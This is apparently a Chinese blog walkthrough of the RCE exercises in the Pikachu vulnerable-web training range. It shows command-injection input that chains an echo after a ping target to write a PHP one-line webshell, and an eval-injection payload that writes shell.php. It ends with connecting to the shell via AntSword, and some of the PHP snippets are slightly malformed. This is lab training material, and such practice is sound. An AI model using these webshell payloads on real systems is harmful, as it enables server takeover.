Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

相关推荐
顾凌陵3 分钟前
Web信息收集实战指南
安全·web安全
RoboWizard3 分钟前
一块硬盘上架前要闯多少关?
java·服务器·数据库
十六年开源服务商13 分钟前
2026社交媒体营销×WordPress运维:实战避坑指南
运维·媒体
吴阿福|一人公司15 分钟前
深度解析 Python 类变量修改的命名空间隔离
java·服务器·数据结构
江南风月17 分钟前
Hermes Agent 接入WGCLOUD实战:打造团队 AI 智能运维解决方案
运维·zabbix·运维开发·prometheus
qq36219670528 分钟前
第三方安卓应用商店安全评测 2026:Appteka、Aptoide、APKPure 等 7 家横评
android·网络·人工智能·安全·chatgpt·智能手机
Turboex邮件分享40 分钟前
邮件系统安全攻防:从钓鱼陷阱到中继滥用的全链路解密
安全
黄焖鸡能干四碗41 分钟前
软件系统概要设计说明书模版(Word)
大数据·运维·数据库·架构·需求分析
土星云SaturnCloud41 分钟前
从云端到边缘:电子装配线AI视频分析在土星云SE110S-WA32上的落地实践
服务器·人工智能·ai·边缘计算
qiuziqiqi1 小时前
ocker-compose.yml 和Dockerfile 区别
运维·docker·容器